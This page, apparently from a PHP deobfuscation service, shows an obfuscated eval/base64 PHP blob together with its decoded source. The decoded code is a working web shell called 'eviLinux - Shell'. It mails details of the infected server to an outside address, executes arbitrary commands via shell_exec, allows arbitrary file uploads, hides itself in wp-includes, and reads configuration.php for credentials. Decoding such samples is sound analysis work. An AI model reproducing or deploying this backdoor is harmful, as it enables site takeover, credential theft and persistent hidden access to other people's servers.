Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /********************************************/ eval(gzinflate(str_rot13(base64_d..

Decoded Output download

<?php @ini_restore("disable_functions");
if (!isset($_SESSION['bajak'])) {
    $visitcount = 0;
    $web = $_SERVER["HTTP_HOST"];
    $inj = $_SERVER["REQUEST_URI"];
    $body = "Shell Injector 
$web$inj";
    $safem0de = @ini_get('safe_mode');
    if (!$safem0de) {
        $security = "SAFE_MODE = OFF";
    } else {
        $security = "SAFE_MODE = ON";
    };
    $df = 'ini_get  disable!';
    $serper = gethostbyname($_SERVER['SERVER_ADDR']);
    $injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
    mail("[email protected]", "$body", "Shell Result http://$web$inj
$security
IP Server = $serper
 IP Injector= $injektor");
    $_SESSION['bajak'] = 0;
} else {
    $_SESSION['bajak']++;
};
if (isset($_GET['clone'])) {
    $source = $_SERVER['SCRIPT_FILENAME'];
    $desti = $_SERVER['DOCUMENT_ROOT'] . "/wp-includes/wp-info.php";
    rename($source, $desti);
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {
    $security = "SAFE_MODE : OFF";
} else {
    $security = "SAFE_MODE : ON";
}
echo "<title>eviLinux - Shell</title><br><br>";
echo "<font size=2 color=#888888><b>" . $security . "</b><br>";
$cur_user = "(" . get_current_user() . ")";
echo "<font size=2 color=#888888><b>User : uid=" . getmyuid() . $cur_user . " gid=" . getmygid() . $cur_user . "</b><br>";
echo "<font size=2 color=#888888><b>Uname : " . php_uname() . "</b><br>";
echo "<font size=2 color=#888888><b>Disable Functions : ";
$df = 'ini_get  disable!';
if ((@function_exists('ini_get')) && ('' == ($df = @ini_get('disable_functions')))) {
    echo "NONE";
} else {
    echo "$df";
}
function pwd() {
    $cwd = getcwd();
    if ($u = strrpos($cwd, '/')) {
        if ($u != strlen($cwd) - 1) {
            return $cwd . '/';
        } else {
            return $cwd;
        };
    } elseif ($u = strrpos($cwd, '\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
echo ' < formmethod = "POST"action = "" > < fontsize = 2color = #888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
    echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
    if (isset($_POST['submit'])) {
        $uploaddir = pwd();
        if (!$name = $_POST['newname']) {
            $name = $_FILES['userfile']['name'];
        };
        move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name);
        if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name)) {
            echo "Upload Failed";
        } else {
            echo "Upload Success to " . $uploaddir . $name . " :D ";
        }
    }
    if (isset($_POST['command'])) {
        $cmd = $_POST['cmd'];
        echo "<pre><font size=3 color=#000000>" . shell_exec($cmd) . "</font></pre>";
    } else {
        echo "<pre><font size=3 color=#000000>" . shell_exec('ls -la') . "</font></pre>";
    }
    if (isset($_GET['baca'])) {
        $conf = file_get_contents("../../configuration.php");
        echo $conf;
    }
    

Did this file decode correctly?

Original Code

<?php

/********************************************/
eval(gzinflate(str_rot13(base64_decode('rUnrQuNTEP9cJP6Hchvd2jpjuEmVQQEjEGRtkY6Exla/ALIce1AW/JJqWqCI/70zu2kel4Nl1VKgOPN+/HPGpyITTsmlylhh0UvIY5rwYElykRJsJql9tLsjc8TaE0VlcrUC3/P9/mNjxabhXWvPYXn7l+fdndaDkE9SbJUp4pJQQ3ct+BQeRG70tze6ol/G48vgy9Af0xtxi+xhgz3y/ppr/jiYjPpTYJrHQiBO/TlCEtLP7msETpLrDC2jOlIpGc5rbRhmkDzFR2EhVYbEIM1wzpbhLwV68tySPKpXoZ7Q+kzPCy6GXQ8MDHs9bfSyu8MTyd+QGoAQuo50LqtdEkVKYY/poGtM8NIFxjyXd/qUhSm3lqky8x2caLsjqF9dDH6P2bnkNaWRajEce3hXdigSi/IHkYisbZRLpdNbJDpEntJ9T2gF6X5dwBGXSKLIXKmi02E3NYR3NnZedP1Y4vPygXAYaA7XGQF3RnwgN5F3YHmjoWH+qohbEh8/6uqJmdUg6kJifMWiJM84ognBJPOqjPg6PJh/PupfjoNe/6s3OLvwmIZVDLgVxF1WaIfnkwtiMA5Tw+GY3Ti0vSgOURYlFYia50zuFPMCsUZlRm/jep8YZrYJ/ycCq/MuYGgMsEAomueEHiuhEn4C7f2K7SUHUbfxuHrox9NF/3AetcIsh9mT4h/u/lOiPIFh/fpMf0DwhDpYrw49YUKXyi0gBhU026UWaCDJAAhDGaWJlu1D+70+JqAAdkciabWl9AkewcLShVDJ7Yps+y1mPaxq+cP2gVCKDQ0q3Vn7x81nzeSSXrPz0OTR69MNyLVBmwUZ8FQhlbQaRHPb5MMHbzHmuhbaS250eLeCLMDdhDgYDjzoPgKkpoCyhlAjQYoF1Ivga1GL2CyKCFYmpEnlV0iWUi4t5O+zNtOzpEx7yFhrpkz2wSdxlFxIclOQ4oBjA8/nNboe1Jr+PRfX1z/iA6RfakU7wswZtKtZVop7EMBliReDhLoGLqUnYjfzPELTMIsbDByLrKgUREIFaqnij4oShIlYozSmm1y/mqZvxTdpKGwIk1f/vgf5NlNpwo42I+XQIHoihQUrirBHTe4gDkjYUd6kg9n8VAqTIsnDmPRRwmgaepTeynMu4ph0aLTSxL4hMAP9mo3jhT927fOzsfZzFAO+0Nodsh7Emn2sptH+9FTtJ+MLfKAkV08pXRVhKJggeB6dqnJ6WsIb5V27DkuxK3OUm/tDdo1L4KEqSTOw19JkNDpoOKD0rBn6nuAB8a9LRhJpA2VNVeMwzR9rYKzzOEAB67sqKi0CowZ0cBmNo93UwfwURpitTAcNKuC+8xhK2wsx14R58P0qiriUUQHJ+dYc7N9BF2kbbNHTtkjkGvRalW5TZ8l3cxrro1uv1KLk6wj6vU7Qof7AvdEvJLAebHGhJb2YDYjaqFjX3xLI/zDKElYOkpC9b2v7DXAaU+EytTybTmHYg0DfPNCHmyfhBDp6+FC+uK3KEHRKvy/YWupNF338Cw==')))); ?> 

Function Calls

base64_decode 1
gzinflate 1
str_rot13 1

Variables

None

Stats

MD5 b73149b0a3a30d510ce5026c1c3ac74b
Eval Count 1
Decode Time 159 ms